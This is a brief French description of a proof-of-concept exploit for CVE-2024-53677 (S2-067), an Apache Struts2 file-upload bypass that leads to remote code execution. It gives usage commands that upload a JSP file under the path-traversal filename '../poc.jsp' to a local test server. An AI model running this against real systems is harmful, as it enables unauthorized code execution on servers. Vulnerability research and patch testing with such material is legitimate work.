
Exploit de preuve de concept pour CVE-2024-53677 (S2-067), un contournement de logique de téléchargement de fichier Apache Struts2 permettant l'exécution de code à distance via des paramètres de nom de fichier conçus.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
